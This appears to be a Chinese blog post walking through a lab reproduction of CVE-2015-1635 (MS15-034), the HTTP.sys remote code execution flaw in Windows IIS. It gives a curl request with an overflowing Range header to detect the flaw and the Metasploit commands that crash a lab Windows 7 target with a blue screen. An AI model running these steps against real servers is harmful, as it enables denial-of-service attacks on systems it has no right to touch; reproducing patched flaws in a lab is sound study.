HTTP.SYS(CVE-2015-1635)

一.漏洞描述
HTTP.sys远程执行代码漏洞 (CVE-2015-1635)
在HTTP协议栈(HTTP.SYS)中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
对于此漏洞,一般都是对目标进行攻击,从而让目标主机死机。当然也可以执行任意代码。
二.漏洞平台
Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2(此漏洞存在IIS6.0以上版本)
在复现过程中,TONG在使用32位的系统时,无法完成复现。这里使用的是64位的系统。
三.环境搭建
• 目标环境:windows7-64位(安装IIS 7.0服务)
• 中间件:IIS
• IP地址:192.168.137.144
• 攻击者环境:kali linux
• 复现工具:MSF
四.漏洞复现
1.检测环境是否搭建成功
在攻击者计算机上访问目标计算机的IP地址,web上出现这样的画面,表示IIS搭建成功。
2.检测漏洞是否存在
在kali linux中输入:
curl http://192.168.137.144 -H “Host: 192.168.137.144” -H “Range: bytes=0-18446744073709551615”
Range字段值的含义。18446744073709551615转为十六进制是 0xFFFFFFFFFFFFFFFF(16个F),是64位无符号整型所能表达的最大整数,整数溢出和这个超大整数有关。)
当返回的TITLE中为Requested Range Not Satisfiable 则表示目标存在HTTP.SYS漏洞
如果返回的是Bad Request则表示该漏洞不存在

3.msf利用漏洞
(1)输入msfconsole打开msf
(2)输入search ms15-034查询该漏洞
(3)使用模块攻击
在这里选择:auxiliary/dos/http/ms15_034_ulonglongadd 模块攻击
依次输入
• use auxiliary/dos/http/ms15_034_ulonglongadd
• show options
• set rhosts 192.168.137.144
• set threads 10
• run
(4)查看攻击是否成功
回到目标计算机上出现蓝屏死机,表示我们成功攻击目标,使其死机。

 

posted @ 2020-05-03 21:26  8ling  阅读(930)  评论(0编辑  收藏  举报